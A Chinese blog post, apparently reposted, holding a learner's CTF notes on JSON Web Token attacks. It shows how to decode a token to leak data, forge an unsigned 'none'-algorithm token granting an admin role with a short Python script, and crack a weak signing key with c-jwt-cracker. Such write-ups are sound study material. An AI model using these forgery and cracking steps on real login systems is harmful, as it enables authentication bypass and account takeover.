热门标签
热门文章
- 1梯度提升树GBDT模型原理及spark ML实现_pyspark gbdt subsamplingrate
- 2C++:继承与派生_c++继承与派生
- 3Springboot 中使用 Redisson+AOP+自定义注解 实现访问限流与黑名单拦截_spring redis 黑名单
- 4如何下载Idea专业版_idea专业版下载
- 5AWS S3 协议对接 minio/oss 等_minio s3协议
- 6Android字体大小多屏幕适配_android字体大小适配屏幕
- 7深入理解package.json中dependencies和devDependencies 的区别_dependencies packge.json会影响其他项目吗
- 8Hive collect_set与collect_list_hive的collect的底层数据结构
- 9基于STM32的ADC采样及各式滤波实现(HAL库,含VOFA+教程)_数据采集滤波算法stm32(2)_vofa+.tabviews
- 10基于51单片机的搬运机器人系统protues仿真_proteus机械臂仿真
当前位置: article > 正文
CTF第十五天_gz ctf
作者:小小林熬夜学编程 | 2024-05-12 16:53:14
赞
踩
gz ctf
JSON Web Token
关于JWT,下面是一些资料
添加链接描述
添加链接描述
简单来说,就是身份验证的payload
敏感信息泄露
1.随便登录一个账号后再网页工具的“网络”查看token
2.解密
添加链接描述
3.将上面和下面拼成flag值就行
无签名
1.在pycharm中加入pyjwt库,下面是安装教程
添加链接描述
2.运行以下脚本
import jwt
payload={
"username": "admin",
"password": "admin",
"role": "admin"
}
token = jwt.encode(payload,algorithm="none",key="")
print(token)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
3.得到payload后,登录,抓包,修改token即可
弱密钥
1.安装工具
网站如下
添加链接描述
命令如下
apt-get install libssl-dev (1)
git clone https://github.com/brendan-rius/c-jwt-cracker (2)
make (3)
./jwtcrack +登录获取的token (4)
- 1
- 2
- 3
- 4
- 5
得到密钥
2.对原本的token进行修改,再重新加密
3.再登陆一次,替换token即可
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/559856
推荐阅读
相关标签
